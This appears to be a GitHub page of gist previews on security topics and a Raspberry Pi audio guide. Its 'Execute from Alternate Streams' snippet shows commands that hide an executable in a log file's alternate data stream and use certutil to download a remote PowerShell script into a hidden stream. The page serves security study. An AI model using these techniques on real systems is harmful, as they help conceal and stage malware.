Skip to content

Instantly share code, notes, and snippets.

View ResistanceIsUseless's full-sized avatar
:shipit:
trying to switch timelines

StaticBunny ResistanceIsUseless

:shipit:
trying to switch timelines
View GitHub Profile
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active May 29, 2025 18:52
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@mill1000
mill1000 / README.md
Last active June 13, 2025 19:42
Headless A2DP Audio Streaming on Raspbian Stretch

About

This gist will show how to setup Raspbian Stretch as a headless Bluetooth A2DP audio sink. This will allow your phone, laptop or other Bluetooth device to play audio wirelessly through a Rasperry Pi.

Motivation

A quick search will turn up a plethora of tutorials on setting up A2DP on the Raspberry Pi. However, I felt this gist was necessary because this solution is:

  • Automatic & Headless - Once setup, the system is entirely automatic. No user iteration is required to pair, connect or start playback. Therefore the Raspberry Pi can be run headless.
  • Simple - This solution has few dependencies, readily available packages and minimal configuration.
  • Up to date - As of December 2017. Written for Raspbian Stretch & Bluez 5.43

Prerequisites

@damienstanton
damienstanton / setup.sh
Created October 24, 2017 15:29
Kali Tools
#!/bin/bash
# must be sudo, by the way
apt-key adv --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6 \
&& echo 'http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list \
&& apt update
apt install -y acccheck ace-voip amap automater braa casefile cdpsnarf cisco-torch cookie-cadger copy-router-config dmitry dnmap dnsenum dnsmap dnsrecon dnstracer dnswalk dotdotpwn enum4linux enumiax exploitdb fierce firewalk fragroute fragrouter golismero goofile lbd maltego-teeth masscan metagoofil miranda nmap p0f parsero recon-ng smtp-user-enum snmpcheck sslcaudit sslsplit sslyze theharvester tlssled twofi urlcrazy wol-e intrace hping3
apt install -y bbqsql bed cisco-auditing-tool cisco-global-exploiter cisco-ocs doona greenbone-security-assistant hexorbase jsql lynis ohrwurm openvas-cli openvas-manager openvas-scanner oscanner powerfuzzer sfuzz sidguesser siparmyknife sqlmap sqlsus tnscmd10g unix-privesc-check yersinia
apt install -y aircrack-ng asleap bluelog blueranger bluesn
@mgeeky
mgeeky / disinfect.sh
Last active November 26, 2017 06:33
Quick & dirty cleaner for PHP malware: 'php.brute.bf1lic.1??.UNOFFICIAL'
#!/bin/bash
echo "Quick & dirty cleaner for PHP malware: 'php.brute.bf1lic.187.UNOFFICIAL'"
echo
function disinfect {
infected=$1
echo "Disinfected file: ($infected)"
sed -i -r -e 's/<\?php if\(\!isset\(\$GLOBALS\["[\\x0-9a-fA-F]+"\]\)\) \{ \$ua=strtolower\(\$_SERVER\["[\\x0-9a-fA-F]+.+ \?><\?php/<?php/g' $infected
}
import sys
def to_octets(ip):
return [int(i) for i in ip.split('.')]
def dotless_decimal(ip):
octets = to_octets(ip)
result = octets[0] * 16777216 + octets[1] * \
@jhaddix
jhaddix / all.txt
Last active July 14, 2025 21:15
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@lanmaster53
lanmaster53 / pyscripter-snippets.py
Last active May 6, 2024 05:03
Burp Python Scripter scripts
# Moved to https://github.com/lanmaster53/pyscripter-er/tree/master/snippets
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@EnchantedGuardian
EnchantedGuardian / offsec.md
Created April 10, 2017 07:21 — forked from jivoi/offsec.md
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*